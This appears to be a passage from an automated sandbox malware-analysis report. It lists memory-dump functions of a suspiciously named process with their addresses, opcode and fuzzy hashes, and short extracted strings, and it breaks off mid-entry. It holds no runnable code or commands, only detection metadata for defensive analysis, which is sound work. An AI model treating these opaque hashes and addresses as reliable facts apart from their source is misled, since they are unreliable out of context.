Function 00007FFA3624C940, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.727954295.00007FFA36240000.00000040.00000001.sdmp, Offset: 00007FFA36240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffa36240000_wjIuhVBtfHXnMCZlWDoj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d69090a472421a407c80e84861f9793419a6647e1e61867e134eb5541459f138
Instruction ID: 892d1843c23e598b7728dde5ce1fa6996b2386f0e86a84792a6fc4c9a00068c1
Opcode Fuzzy Hash: d69090a472421a407c80e84861f9793419a6647e1e61867e134eb5541459f138
Instruction Fuzzy Hash: 61E06D30D2894D9FEB91EFA8884AAF977E4FF0A704F409476E80CD2290DE3561A0CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36240DA5, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.727954295.00007FFA36240000.00000040.00000001.sdmp, Offset: 00007FFA36240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffa36240000_wjIuhVBtfHXnMCZlWDoj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a2ec8d0e25ed28eb1e507b2ff56b38257122189a5f8f92f94b4d5972d16d43a
Instruction ID: 149af46c7c8b8a8b388114f66d22dd5953cda38a78416f3df8909f1007b58829
Opcode Fuzzy Hash: 8a2ec8d0e25ed28eb1e507b2ff56b38257122189a5f8f92f94b4d5972d16d43a
Instruction Fuzzy Hash: D5E03930E0810A8AEB55EB80C8469FD73B1EF5A310F015639D01E93391CFB969849640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362407F4, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.727954295.00007FFA36240000.00000040.00000001.sdmp, Offset: 00007FFA36240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffa36240000_wjIuhVBtfHXnMCZlWDoj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f99ec1ba82589908a94208b833c3f771584eb5e3767330b198a2ae795db8b61
Instruction ID: 8b9bc6bbe682d6abfc10ec540c7be15588e7024187b7faa45347e5f5a5e144f7
Opcode Fuzzy Hash: 9f99ec1ba82589908a94208b833c3f771584eb5e3767330b198a2ae795db8b61
Instruction Fuzzy Hash: B5E01A30D4D10B8AF712AB808846ABE7274AF12351F12E531C01E8A386CE3D65C5AE91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFA3624CB07, Relevance: 8.9, Strings: 7, Instructions: 170COMMON

Download Yara Rule

Strings

-, xrefs: 00007FFA3624D604
}, xrefs: 00007FFA3624CB6D
", xrefs: 00007FFA3624CBF4
', xrefs: 00007FFA3624D52C
/, xrefs: 00007FFA3624CF2D
[, xrefs: 00007FFA3624D5B5
", xrefs: 00007FFA3624CCB0

Memory Dump Source

Source File: 0000000A.00000002.727954295.00007FFA36240000.00000040.00000001.sdmp, Offset: 00007FFA36240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffa36240000_wjIuhVBtfHXnMCZlWDoj.jbxd

Similarity

API ID:
String ID: "$"$'$-$/$[$}
API String ID: 0-631831671
Opcode ID: 70f2eb3eb07293bbd9d306acc476b0200c97c7b5a8acbf9f5d4c6b2ca276a820
Instruction ID: 7d849b81bc4deed35285d4efec914ed775faf67604def67a85d3a4592b05af74
Opcode Fuzzy Hash: 70f2eb3eb07293bbd9d306acc476b0200c97c7b5a8acbf9f5d4c6b2ca276a820
Instruction Fuzzy Hash: 9381F470D082298FEB69DF55C895BFDB6B1AF56301F1190BAD40DA6391CE395A80EF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3624A521, Relevance: 6.3, Strings: 5, Instructions: 90COMMON

Download Yara Rule

Strings

], xrefs: 00007FFA3624B8D9
k, xrefs: 00007FFA3624B838
H, xrefs: 00007FFA3624B871
E, xrefs: 00007FFA3624B90E
{, xrefs: 00007FFA3624A535

Memory Dump Source

Source File: 0000000A.00000002.727954295.00007FFA36240000.00000040.00000001.sdmp, Offset: 00007FFA36240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffa36240000_wjIuhVBtfHXnMCZlWDoj.jbxd

Similarity

API ID:
String ID: E$H$]$k${
API String ID: 0-2038897844
Opcode ID: 769141677223d956ed16ca365f3f85d8cfbf45707186cc1395d7ffc653ba5fcf
Instruction ID: 533e24f421721c53902b56b42c5e7371eafc571990f9aa8ece3e074f60304d69
Opcode Fuzzy Hash: 769141677223d956ed16ca365f3f85d8cfbf45707186cc1395d7ffc653ba5fcf
Instruction Fuzzy Hash: CC411670D086698FEB69CF54C856BEDB6B1AB55302F0181FAE00DA6781CF795AC4DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362484A5, Relevance: 5.1, Strings: 4, Instructions: 83COMMON

Download Yara Rule

Strings

]_^Y, xrefs: 00007FFA36248572
]_^G, xrefs: 00007FFA3624852A
]_^[, xrefs: 00007FFA36248579
]_^E, xrefs: 00007FFA36248522

Memory Dump Source

Source File: 0000000A.00000002.727954295.00007FFA36240000.00000040.00000001.sdmp, Offset: 00007FFA36240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffa36240000_wjIuhVBtfHXnMCZlWDoj.jbxd

Similarity

API ID:
String ID: ]_^E$]_^G$]_^Y$]_^[
API String ID: 0-3139849780
Opcode ID: 08d74b759e6b6e9012f15f937dca5444ca6d3a860ccb706e0d8583018ef14154
Instruction ID: da3ef195867e97acdffa5f0c43a6e796b1a1c2675b1774bc3325c6ab69707b95
Opcode Fuzzy Hash: 08d74b759e6b6e9012f15f937dca5444ca6d3a860ccb706e0d8583018ef14154
Instruction Fuzzy Hash: B621F5739061195A96007B3EB8833EC37D1DF52770B114772C8ACCA062AE293ECA8E94

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362484C8, Relevance: 5.1, Strings: 4, Instructions: 67COMMON

Download Yara Rule

Strings

]_^Y, xrefs: 00007FFA36248572
]_^G, xrefs: 00007FFA3624852A
]_^[, xrefs: 00007FFA36248579
]_^E, xrefs: 00007FFA36248522

Memory Dump Source

Source File: 0000000A.00000002.727954295.00007FFA36240000.00000040.00000001.sdmp, Offset: 00007FFA36240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffa36240000_wjIuhVBtfHXnMCZlWDoj.jbxd

Similarity

API ID:
String ID: ]_^E$]_^G$]_^Y$]_^[
API String ID: 0-3139849780
Opcode ID: 3c4055face6c5ab5d7ca0412043cdfd90cf6c1ae4db8c668261aa0675e41dff1
Instruction ID: 41e9d10f10c1c42508e0f4261a8ed1941838a4a85fddfd7de39ac008233ada07
Opcode Fuzzy Hash: 3c4055face6c5ab5d7ca0412043cdfd90cf6c1ae4db8c668261aa0675e41dff1
Instruction Fuzzy Hash: BF11B9739152195AD7107F3EB8833EC37D1DF52770B514775C8ACCA062AE2839CA8E94

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362484D0, Relevance: 5.1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

Strings

]_^Y, xrefs: 00007FFA36248572
]_^G, xrefs: 00007FFA3624852A
]_^[, xrefs: 00007FFA36248579
]_^E, xrefs: 00007FFA36248522

Memory Dump Source

Source File: 0000000A.00000002.727954295.00007FFA36240000.00000040.00000001.sdmp, Offset: 00007FFA36240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffa36240000_wjIuhVBtfHXnMCZlWDoj.jbxd

Similarity

API ID:
String ID: ]_^E$]_^G$]_^Y$]_^[
API String ID: 0-3139849780
Opcode ID: 850f8c9e46a813b4b0b104ca6a4fca770e809f60777723d13e7846e543aa6144
Instruction ID: 14af643ae46948b97858140434afb0e9a5b380a85eec41b0126cd67eb7791294
Opcode Fuzzy Hash: 850f8c9e46a813b4b0b104ca6a4fca770e809f60777723d13e7846e543aa6144
Instruction Fuzzy Hash: 5711C8739152195A97107F3EB8833DC37D1DF52770B514775C8ACCA062BE2839CA8E94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: refhostperfdllCommonsessionnetsvc.exe PID: 5292 Parent PID: 744 refhostperfdllCommonsessionnetsvc.exeCOMMON

Executed Functions

Function 00007FFA3623ADAB, Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

8, xrefs: 00007FFA3623ADB8
T__H, xrefs: 00007FFA3623A3CF

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: 8$T__H
API String ID: 0-184669414
Opcode ID: 37781c1bb7429da7b31646e417a251950254917a360243b240d92a5ff61dd234
Instruction ID: 8b47db986f64fbc1b76abe3653cb1fac2ab00a353bde27ae747c061fe738ccc6
Opcode Fuzzy Hash: 37781c1bb7429da7b31646e417a251950254917a360243b240d92a5ff61dd234
Instruction Fuzzy Hash: 60310B71E187598BEB64DB5888557A8B7F1FB65300F5192FAE00DE3291DF356A80CF01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623CDD4, Relevance: 2.5, Strings: 2, Instructions: 35COMMON

Download Yara Rule

Strings

, xrefs: 00007FFA3623CE23
/, xrefs: 00007FFA3623CF2D

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: $/
API String ID: 0-2637513485
Opcode ID: 04fb13df6823cda3c0c466a6b3771c6776e7d1352d1b4dfc2f5d181878dac52b
Instruction ID: 42dd32076123cea69aaaa6df338d20b2905289440678c5d1e586f5ab9eae977a
Opcode Fuzzy Hash: 04fb13df6823cda3c0c466a6b3771c6776e7d1352d1b4dfc2f5d181878dac52b
Instruction Fuzzy Hash: 96019274E08A1D8FEBA4EB48C898AE8B7B1FB59300F1042AAD40DD7390CF346980DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36238AA1, Relevance: 1.4, Strings: 1, Instructions: 185COMMON

Download Yara Rule

Strings

q_H, xrefs: 00007FFA36238C03

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: q_H
API String ID: 0-994609960
Opcode ID: 15dc164a5496092d84fa4ab4ea4f25f8cea3d19f469d22e9c2829c7b95c39b4c
Instruction ID: 36875b5304e221880bf04aa523d80987ac5482ce0f7e5889f52076337d874d77
Opcode Fuzzy Hash: 15dc164a5496092d84fa4ab4ea4f25f8cea3d19f469d22e9c2829c7b95c39b4c
Instruction Fuzzy Hash: 26513970D0861E8FEB98DB988455AFCB7B1EF59300F61917AE40DEB382DF3968419B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36238B2C, Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

q_H, xrefs: 00007FFA36238C03

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: q_H
API String ID: 0-994609960
Opcode ID: ae9288f6eba4ac6582d9a2581e9e6e13b2c7a396ceea0e44817451c53cec43b7
Instruction ID: f0fd4a99aa45fcaa8a2efaa90d43dde8663df9c9fe26109f3926300749790d97
Opcode Fuzzy Hash: ae9288f6eba4ac6582d9a2581e9e6e13b2c7a396ceea0e44817451c53cec43b7
Instruction Fuzzy Hash: E031FB70D18A1D8EEB94EB989895AFCB7B1FF59300F61513AE40DE7382DF3968419B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36235936, Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

=, xrefs: 00007FFA362359E3

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: =
API String ID: 0-2322244508
Opcode ID: 3c74b83700b6e85250960bff1940679bcaa043bbfe68c151208e5f2ebc1b7f59
Instruction ID: d3af9c78758735eca47b5fdca6d8011ed2bc5ad33d19056dc08007ac6cad87dd
Opcode Fuzzy Hash: 3c74b83700b6e85250960bff1940679bcaa043bbfe68c151208e5f2ebc1b7f59
Instruction Fuzzy Hash: C1313C70D0462A8FEB65DB14C844BE9B7B2FF8A310F50C6E6D50DA7385DB356A818F90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623A39E, Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

T__H, xrefs: 00007FFA3623A3CF

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: T__H
API String ID: 0-1206888029
Opcode ID: 79ac50393ab9e53734bdf6899c1802af9797ba7c8191496ffcd352134bbb5be8
Instruction ID: e76dcd17569abf39e7cf9430166ca3a47c9a75e73860431b0246dee7761c56e0
Opcode Fuzzy Hash: 79ac50393ab9e53734bdf6899c1802af9797ba7c8191496ffcd352134bbb5be8
Instruction Fuzzy Hash: EF211AB1D187198FEBA8DB2888557A8B6F1FB59300F5151FAE10DE3292DE356A808F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362303D8, Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2961682470150aeb327e35e9621ee736869624a210c1897517d7cae9d4aeb64f
Instruction ID: ba9d19f4348d92c7694b4bff4cf567bb58e545cd4e533bc801f9b6785558a832
Opcode Fuzzy Hash: 2961682470150aeb327e35e9621ee736869624a210c1897517d7cae9d4aeb64f
Instruction Fuzzy Hash: 59D12D70D186598FEB98EB98C855BB8BBF1FF5A300F1481BAD00DA7292DE356845DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36239801, Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29f05e6f0e57e83cae75358f90f607884e118449f0d804515c0866f46dfc6d99
Instruction ID: 32ee4a62e962f9e9d97dafa17bdb80cb36bc58631b1fe5c333c6dc8414be9252
Opcode Fuzzy Hash: 29f05e6f0e57e83cae75358f90f607884e118449f0d804515c0866f46dfc6d99
Instruction Fuzzy Hash: 39B15F71D186598FEBA8EB98C8557B8BBE1FF5A300F1481BAD00DD7292DE356844EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623D9A5, Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8261957b74665a07a96232209c3d534ed72920a60e58083b7ad2150fa98f0d1
Instruction ID: 34a7d5c02b893d23be0c00ef03ced7935c07304cf55198f3683298dc5f1fb0c9
Opcode Fuzzy Hash: a8261957b74665a07a96232209c3d534ed72920a60e58083b7ad2150fa98f0d1
Instruction Fuzzy Hash: 7C711D70D0865D8FEB94EBA8C8957A9B7B1FF59301F1045B9E40DD7291CF359881CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623E519, Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b43475bd7c10c94080a3e242fe372ec11bb13d72783b004afd42d04a9a06589
Instruction ID: b89401ad1ab5667f7653172db3fecde9a0fe99fe0164ed7db45355244d438eba
Opcode Fuzzy Hash: 7b43475bd7c10c94080a3e242fe372ec11bb13d72783b004afd42d04a9a06589
Instruction Fuzzy Hash: 8261F570D1861D8FEB50EBA8C855AECBBB1FF59300F50817AE04DE3292DF3468859B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623E390, Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ffa8248946a6cb6b3a093898026b927dd7ae768bd47140e81df2740c772059f
Instruction ID: 868b9cffa9fd62b0672ba4e18cb25a67402f785c7409bcabfda704c6ded3f020
Opcode Fuzzy Hash: 2ffa8248946a6cb6b3a093898026b927dd7ae768bd47140e81df2740c772059f
Instruction Fuzzy Hash: 2A312737B0872559D6207BADF8465E9B7D4DF857B3B108537D28CC9052DA2570CE8BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623E3A8, Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cc5633e6fb457eb6fe8a8e36e90e2761be6c533f5e6048d1ff1332fd2c8f33f
Instruction ID: 363dae6af1f66c567827622fa2d457f137bc0eaf057d33baa654ddeb2937ee4d
Opcode Fuzzy Hash: 1cc5633e6fb457eb6fe8a8e36e90e2761be6c533f5e6048d1ff1332fd2c8f33f
Instruction Fuzzy Hash: EE312437B0872969D220BBEDF8855EAB794DF857B3B104537E24CC9452DA25708E8BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623E3B0, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3106e322936bb45cf80dec397b7527d7249a0a789390032e185649ed9613a31
Instruction ID: 5e8dae5667f356ff4356b1fe5b80255ab4546becd0ab25ac4be77ee2854321df
Opcode Fuzzy Hash: f3106e322936bb45cf80dec397b7527d7249a0a789390032e185649ed9613a31
Instruction Fuzzy Hash: BB312437B0872969D320BBEDF8855EAB794DF857B3B104537E24CC5452DA25708E8BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623DA9D, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b357b63a51633970282745f8b230deef1c3261b095d50f0859f68c9dd61d42be
Instruction ID: ce6535a7348700dd5f2585d866efdec2e64ec053c68c1c8d0795e92981da9c1c
Opcode Fuzzy Hash: b357b63a51633970282745f8b230deef1c3261b095d50f0859f68c9dd61d42be
Instruction Fuzzy Hash: B641E870E04A5D8FEB94EB98C895BADB7B1FB99301F1080B9D44DD7251CF35A881CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36230F39, Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0442afd0af7d32f379451bdc3b7b9c980bfd8da30eaba1828096ce7e3eb13a80
Instruction ID: bc8115a92081ef86c382315a6c014bf85dae9987930d39a5dc8be0b74df61874
Opcode Fuzzy Hash: 0442afd0af7d32f379451bdc3b7b9c980bfd8da30eaba1828096ce7e3eb13a80
Instruction Fuzzy Hash: 1C414671D0865D8FEB50DB94C458AECBBF0EF46300F61917AE40DE7292CF3A69499B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623E3E0, Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4981abd1143c85fe5f2292ae89359a01b662c2e846f55458f9cf248ad82c5e36
Instruction ID: eaec88a059181b5da5aeb2ee24b0d5e3e8cc51bb1c76335a5e51cfe926e8106a
Opcode Fuzzy Hash: 4981abd1143c85fe5f2292ae89359a01b662c2e846f55458f9cf248ad82c5e36
Instruction Fuzzy Hash: 7E212637B0872869D220BBEDF8845EAB794DFC53B7B104977E34CC5541DA62708E8BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623FF81, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aaf366af9488d62a7ce50f00ff0c7d0fa0c2a3728603d7445ca9c0ca47ea8c3
Instruction ID: 31b1f4e371a9647ecadb46f07965f9516591fba8a315dbfc007c6d78c0ec734e
Opcode Fuzzy Hash: 3aaf366af9488d62a7ce50f00ff0c7d0fa0c2a3728603d7445ca9c0ca47ea8c3
Instruction Fuzzy Hash: C5316871D0861A8FEB58DFA8D495AFDB7B0EF1A301F11653AE40DA3281CF396981DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36230669, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: affd476b9769d6ba2c16deb7f3883bb1a36c84c49232d546648f03abc049afad
Instruction ID: 69e07c20119178694be72c9c3a9cdbd1e8cd07eb7b82dacc38150856425011ad
Opcode Fuzzy Hash: affd476b9769d6ba2c16deb7f3883bb1a36c84c49232d546648f03abc049afad
Instruction Fuzzy Hash: EF31D171D0C78D8FF7659BA88859AA87FB0EF57300F1590BAE48DC7292CE395884CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623E408, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3fee12038d54c602d9b4c10729af7b0055564a71a61e14da3d4f7f083c92b32
Instruction ID: 8e5d413cf210a572ae5bc471e265699bf44240cfd597034f86ad578a3f99fcbe
Opcode Fuzzy Hash: e3fee12038d54c602d9b4c10729af7b0055564a71a61e14da3d4f7f083c92b32
Instruction Fuzzy Hash: CE210B37B0872869D620BBEDF8895EAB794DFC53B3B104577E34CC5401DA25748D87A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36230FE2, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9e3418464052360a5b413348cfe98248809d3132db3db1e18d32a2acfbeb26f
Instruction ID: 8f776f26c64e15478821155f0551b1539ed9a710d0c9f0798470b3dc8e046909
Opcode Fuzzy Hash: a9e3418464052360a5b413348cfe98248809d3132db3db1e18d32a2acfbeb26f
Instruction Fuzzy Hash: 6D21CF71D086198FEB84EB98C488AECBBF1EF59301F20912AE409E7291CB396945DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3624011F, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8040c2468dc6239b542f97c89ff68bff406d53464d10eca9be8ce41242ad5e
Instruction ID: 0b47ed79a86339129f70de226c56992d193d8d4c3a63e5e58fc9ecaa23134841
Opcode Fuzzy Hash: fa8040c2468dc6239b542f97c89ff68bff406d53464d10eca9be8ce41242ad5e
Instruction Fuzzy Hash: 9421D135D1864D8FEB51EFA8D846AE97BB0FF56314F00817AE80CD3282DA35A9548B80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623077D, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ac57ddbb749dae6c6cbf7540da7aa52becaddea1cf9f4ec771e70334448e3ff
Instruction ID: a94963813ddda1acc892df69d8666057db08d10f89e7441b88f835bf5c931b9b
Opcode Fuzzy Hash: 0ac57ddbb749dae6c6cbf7540da7aa52becaddea1cf9f4ec771e70334448e3ff
Instruction Fuzzy Hash: 4E117F71C4924A8AF7119F908844AFE77B0AF02301F219536E0899A3C2DF3E6605EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36231103, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bd5fa9a844d69e2f6469c07f87fa75f0d56df7391bc18c52a23047c5703ec49
Instruction ID: 76baaf0b92de887c543bda1950637880a93cac301e872fb326c0c8032060ea25
Opcode Fuzzy Hash: 0bd5fa9a844d69e2f6469c07f87fa75f0d56df7391bc18c52a23047c5703ec49
Instruction Fuzzy Hash: 8E11E53188E3C55FD7539BB04C289E57FF4AF57210B0A40EBD489CB0A3D66D0849C722

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36240185, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d8c30051eee422c42db2909002fb3bbf605e5f18a7ec27d4359ac5296119e5b
Instruction ID: 38ffdc12ca626d21d73c60c9899d5cde77a79e0750acca9dfb377d74b4ea95af
